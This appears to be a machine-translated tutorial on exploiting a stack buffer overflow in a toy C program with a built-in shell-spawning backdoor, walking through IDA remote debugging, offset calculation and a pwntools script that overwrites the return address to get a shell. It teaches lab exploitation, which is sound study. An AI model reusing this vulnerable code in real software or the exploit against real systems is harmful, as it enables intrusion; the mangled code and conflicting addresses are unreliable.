Shulou(Shulou.com)06/03 Report--

This article introduces the knowledge of "how to understand the principle of stack overflow and how to write EXP". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Code analysis with stack overflow

Know a little bit about C and assembly, this is an example that anyone can use. To put it simply, just have hands. Post the C code we are going to use in this experiment, and I use comments to explain it:

/ / stack_overflow.c#include / / this is the function void stack_overflow () {char buf [64] = {0}; scanf ("% s", & buf); / / reads the input data into buf printf ("Hello% s\ n", & buf) / / print out the contents of buf} / / to facilitate the experiment, leave a backdoor function void get_shell () {system ("/ bin/sh");} / / Program entry void main () {stack_overflow ();}

To analyze, the stack overflow part of the above code is in the `stack () `function, because buf is in the stack space, and buf allocates 64 bytes but does not limit the length of input.

How to stack overflow

Since it is a stack overflow, then I believe we all have a certain foundation, at least to understand what a stack is. First of all, the most important thing is that we need to know why there is a stack, starting with the invention of the function. If you are interested, check out wiki. One of the uses of the stack is to store local variables, so the return address of the upper function is also stored in the stack.

Debugging for the first time

Now that the code is written, let's compile and run it first.

[root@localhost pwn] # gcc stack_overflow.c-o stack_ overflow [root @ localhost pwn] #. / stack_overflow stack_overflowHello stack_overflow

Well, the result is simple, enter a string, and then output. So we open the IDA of the host, drag our compiled program into IDA, and then make a good breakpoint in stack_overflow.

Next, copy the linux_server of the IDA installation directory to centOS and run it.

[root@localhost pwn] #. / linux_server IDA Linux 32-bit remote debug server (ST) v1.22. Hex-Rays (c) 2004-2017Listening on 0.0.0.0 23946.

In IDA, select "Debugger"-> "Select debugger"; then select "Remote Linux debugger" and click "OK"; click "Debugger"-> "Process options..."; the default IP,Port for filling Hostname into centOS is 23946; other defaults, and then we press "F9" to start debugging

We continue to go down until we enter `AAAAAA`

So here comes the idea, because the above program does not check the length of the input, for the above program, what we need to do is to calculate the length of the input, then fill the backdoor address to the returned address, and calculate that the length of the input address to the buf address `0xBF8C17BC0xBF8C1770` equals `0x4C`, so the next train of thought is very clear. We fill in the backdoor address after filling in 0x4C characters.

The second debugging

This is followed by the first debugging, this time we use pwntools to take over the input and output of the program. First, we use socat on centOS to forward input and output to port 9999:

[root@localhost pwn] # socat tcp-listen:9999,reuseaddr,fork EXEC:./stack_overflow,pty,raw,echo=0

[root@localhost pwn] # socat tcp-listen:9999,reuseaddr,fork EXEC:./stack_overflow,pty,raw,echo=0

Then we use pwntools to connect:

➜~ python3Python 3.7.4 (default, Sep 7 2019, 17:46:28) [Clang 10.0.1 (clang-1001.0.46.4)] on darwinType "help", "copyright", "credits" or "license" for more information. > > from pwn import * > io = remote ('172.16.177.134' 9999) [x] Opening connection to 172.16.177.134 on port 9999 [x] Opening connection to 172.16.177.134 on port 9999: Trying 172.16.177.134 [+] Opening connection to 172.16.177.134 on port 9999: Done

At this point, the connection is successful and the stack_overflow program is running; return to IDA, and we will make a good breakpoint in the next sentence of scanf assembly; then select "Debugger"-- > "Attach to process...", select the running stack_overflow; and click "OK"; then press "F9" to make the program run

In Python, let's go ahead and send the data we entered, remember to send a carriage return, or you can use the sendline () function to bring your own carriage return:

> payload = b'A'*0x4c + p32 (0x0804848e) > io.send (payload) > io.send ('\ n')

Then IDA breaks down, and we move on to retn, where we find that we are about to jump to get_shell ().

Next, I will not debug one by one. Interested students can continue to follow. Here I directly `F9`, and then use pwntools to enter the command line interaction mode. In order to make everyone feel a little bit':) `, I added a flag.txt here:

> io.interactive () [*] Switching to interactive modeHello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA additional lsflag.txt linux_server stack_overflow stack_overflow.ccat flag.txtflag {Y0u_Win_by_ATL_TEAM}

Remember io.close () every time you finish debugging, otherwise there will be a lot of stack_overflow programs.

EXP writing

To sum up, then EXP should write like this.

#! / usr/bin/env python3#-*-coding: utf-8-*-from pwn import * io = remote ('172.16.177.134, 9999) payload = b'A'*0x4C + p32 (0x08048475) io.sendline (payload) io.interactive () io.close () "how to understand the principle of stack overflow and how to write EXP" is here. Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.